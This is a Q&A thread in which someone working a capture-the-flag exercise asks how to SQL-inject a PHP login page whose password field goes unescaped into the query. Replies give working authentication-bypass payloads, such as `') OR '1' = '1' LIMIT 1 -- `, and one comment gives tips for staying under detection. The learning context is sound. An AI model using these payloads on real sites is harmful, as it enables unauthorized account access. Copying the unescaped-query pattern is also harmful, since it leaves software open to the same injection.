# A simple SQL request

Tags: php, mysql, sql, code-injection

for learning purposes (it's only an exercice) I have to try to SQL-inject a simple php code.
Here is the code :

```
$query = sprintf("SELECT * FROM my_table WHERE login = '%s' AND password = MD5('%s')",      mysql_real_escape_string($_POST['login']),      $_POST['password']  );

$sql = mysql_query($query);

if (@mysql_num_rows($sql) == 1)

$auth = TRUE;
```

The access is granted by "$auth = TRUE". I have understood that the weakness is in the password field because the characters are not escaped. However I don't get it.
I have tried many strings using what I - think I - know about AND having precedence over OR like :

```
‘) OR id = 1 AND MD5(‘a’) = MD5(‘a
```

I suppose there is something about the SQL request syntax that I ignore. It would be awesome if someone could point it out !

Thanks in advance :)

/////EDIT/////

I have tried with

```
‘) OR ‘1’ = ‘1’ LIMIT 1 —
```

but without success...

Here is the full code of the "page":

```
<?php

# Easy starter :)

/* Init database
-- Table structure for table `haxorz_memberz`
--

CREATE TABLE IF NOT EXISTS `haxorz_memberz` (
  `login` varchar(15) collate utf8_unicode_ci NOT NULL,
  `password` varchar(65) collate utf8_unicode_ci NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
*/

define('BDD_HOST', 'localhost');
define('BDD_USER', 'FIXME');
define('BDD_PASSWORD', 'FIXME');
define('BDD_DATABASE', 'FIXME');

define('CHALLENGE_PASSWORD', 'FIXME');

require_once dirname(__FILE__).'/inc/lang.php';
require_once dirname(__FILE__).'/inc/header.php';

$auth = FALSE;

if (isset($_POST['login'], $_POST['password']) && is_string($_POST['login']) && is_string($_POST['password']))
{
    $con = mysql_connect(BDD_HOST, BDD_USER, BDD_PASSWORD);
    mysql_select_db(BDD_DATABASE, $con);

    $query = sprintf("SELECT * FROM haxorz_memberz WHERE login = '%s' AND password = MD5('%s')",
        mysql_real_escape_string($_POST['login']),
        $_POST['password']
    );

    $sql = mysql_query($query);

    if (@mysql_num_rows($sql) == 1)
        $auth = TRUE;
     else
        printf(fail);
}

if ($auth)
{
    printf(greetz, CHALLENGE_PASSWORD);
}
else
{
    echo <<< EOT
        <form method="post" action="">
        <table style="margin-left : auto; margin-right : auto;">
            <tr><td><strong>Login</strong></td><td><input type="text" size="15" name="login" /></td></tr>
            <tr><td><strong>Password<strong></td><td><input type="password" size="15" name="password" /></td></tr>
            <tr><td colspan="2" style="text-align: center;"><input type="submit" /></td></tr>
        </table>
        </form>
EOT;

}

require_once dirname(__FILE__).'/inc/footer.php';

?>
```

Comment: Are you sure there's an `id` field? You could just do a simple `‘) OR '1' = '1' LIMIT 1 --`. As a general rule, you don't need to care too intensely about things to the right of the unescaped string, because you can always use `--` (or whatever comment syntax the DB supports) to comment out the rest of the line.

Comment: `bla') OR 1 = 1 -- ` as password with a valid username should be sufficient. The approach with LIMIT 1 of @ParthianShot should work even better. The double hyphen at the end makes the rest of the statement to a comment like little [Bobby Tables mom](http://xkcd.com/327/) did.

Comment: You can always test this with a tool like [SQLMap](http://sqlmap.org/).

Comment: @tadman True. But SQLMap is way less subtle than individual queries; by traffic volume from your machine alone someone would know something was up. If there were rate limiting, you'd be screwed, so sometimes it's better to do things the old fashioned way. Besides which, there's educational value in learning how the attack is done before you offload the legwork to a third-party tool. That way you'll have a firmer understanding of its use and limitations.

Comment: I.e. why parameterized prepared statements will close most doors.

Comment: The code requires exactly one row in the result set (`mysql_num_rows($sql) == 1`), so you need to make sure that the result set is only exactly one row. You can do this by limiting the result set with `LIMIT 1`, as already mentioned by others. To log in as a specific user, you may also want to use `login = 'admin'` as additional injected condition, so `') OR login = 'admin' -- ` (note the [trailing space](http://dev.mysql.com/doc/en/ansi-diff-comments.html)).

Comment: **please don't format code as citation**; format it as code using the `{}` buttons.

Answer (score 0):

Your approach with `') OR '1' = '1' LIMIT 1 --` should work.
But make sure that

a. There is a space after `--`, otherwise it's not considered a comment.
b. You enter a valid login.

The final query then should look like this

```
SELECT 
  * 
FROM 
  haxorz_memberz 
WHERE 
  login = 'your_login' AND 
  password = MD5('') OR 
  '1' = '1'
LIMIT 1 -- ')
```

Which is a valid query and should give you exactly one entry with the login `your_login`

Comment: Thank you, I will try it, if you wonder, this is from "http://basicvuln.hacking.w3challs.com".
Just another question : how is the request considered complete with the end commented ? Can the SQL request be accepted without the closing brackets and parentheses ?

Comment: why single quotes?  Why not `' OR 1 = 1 LIMIT 1; -- `?